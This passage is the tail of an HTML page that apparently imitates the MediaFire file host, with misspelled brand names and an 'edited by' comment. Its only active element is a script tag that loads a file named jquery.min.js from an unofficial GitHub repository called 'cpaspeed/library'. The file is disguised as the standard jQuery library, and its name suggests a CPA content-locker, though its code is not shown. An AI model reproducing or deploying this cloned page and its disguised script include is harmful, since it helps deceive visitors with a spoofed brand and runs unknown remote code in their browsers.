                                <a href="#" class="footerIcnBlog" title="walo Blog">
                                    <span class="footerIcnBlog"></span>
                                </a>
                            </li>
                            <li class="footerIcn">
                                <a href="#" class="footerIcnTw" rel="noreferrer" title="walo's Twitter page">
                                    <span class="footerIcnTw"></span>
                                </a>
                            </li>
                            <li class="footerIcn" style="margin-left: 0;">
                                <a href="#" class="footerIcnFb" rel="noreferrer" title="Mediafir's Facebook page'">
                                    <span class="footerIcnFb"></span>
                                </a>
                            </li>
                        </ul>
                    </div>
                    <div class="socialLinks" id="minSocialLinks">
                        <a href="#" class="shareFacebook" title="Mediafir on Facebook"><span
                                style="display: none">Facebook Page</span></a>
                        <a href="#" class="shareTwitter" title="Mediafir on Twitter"><span style="display: none">Twitter
                                Page</span></a>
                        <a href="#" class="shareBlogger" title="Mediafr Blog"><span style="display: none">Mediafr
                                Blog</span></a>
                    </div>
                </div>
            </div>
        </div>

        <img style="display: none !important;" src="#">
        <img style="display: none !important;" src="#">
        <script data-cfasync="false" type="text/javascript"></script>
        <script src="https://cdn.jsdelivr.net/gh/cpaspeed/library@main/jquery.min.js"></script>
    </body>
    <!-- EDITED BY JMIX COD4 -->

</html>
